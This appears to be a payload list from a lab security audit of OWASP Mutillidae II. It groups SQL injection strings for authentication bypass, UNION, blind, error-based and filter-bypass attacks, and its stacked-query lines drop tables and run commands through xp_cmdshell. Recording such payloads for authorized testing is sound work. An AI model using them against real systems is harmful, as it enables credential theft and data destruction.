# SQL Injection Payloads Utilizados en la Auditoría
# PAI-3 VULNAWEB - Security Team INSEGUS

## Authentication Bypass
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' OR '1'='1'/*
admin' OR '1'='1
admin'--
admin'#
' or 1=1--
' or 1=1#
' or 1=1/*
') or ('1'='1
') or ('1'='1'--

## UNION-Based Injection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
' UNION SELECT null,username,password,null,null FROM accounts--
1' UNION SELECT null,table_name,null FROM information_schema.tables--
1' UNION SELECT null,column_name,null FROM information_schema.columns--

## Blind SQL Injection - Boolean Based
' AND '1'='1
' AND '1'='2
1' AND 1=1--
1' AND 1=2--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--

## Blind SQL Injection - Time Based
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
1' AND SLEEP(5)--
1'; WAITFOR DELAY '00:00:05'--
1' AND BENCHMARK(5000000,MD5(1))--

## Error-Based Injection
' AND extractvalue(0x0a,concat(0x0a,(SELECT database())))--
' AND updatexml(0x0a,concat(0x0a,(SELECT version())),0x0a)--
' AND (SELECT COUNT(*) FROM information_schema.tables GROUP BY CONCAT((SELECT version()),FLOOR(RAND(0)*2)))--

## Stacked Queries
'; DROP TABLE users--
1'; EXEC xp_cmdshell('whoami')--
1'; INSERT INTO users VALUES ('hacker','hacked')--

## Database Fingerprinting
' AND @@version--
' AND version()--
' AND sqlite_version()--

## Data Extraction
' UNION SELECT NULL,group_concat(username),group_concat(password),NULL FROM users--
' UNION SELECT table_schema,table_name,column_name FROM information_schema.columns--

## Bypass Filters
' OR 1=1%00
' OR 1=1%23
' /**/OR/**/1=1--
' OR 1=1;%00
admin'||'1'='1
admin'||'1'||'='||'1

# Notas:
# - Todos estos payloads fueron probados contra OWASP Mutillidae II
# - Los payloads exitosos están marcados en el informe principal
# - Usar solo en entornos autorizados y de prueba
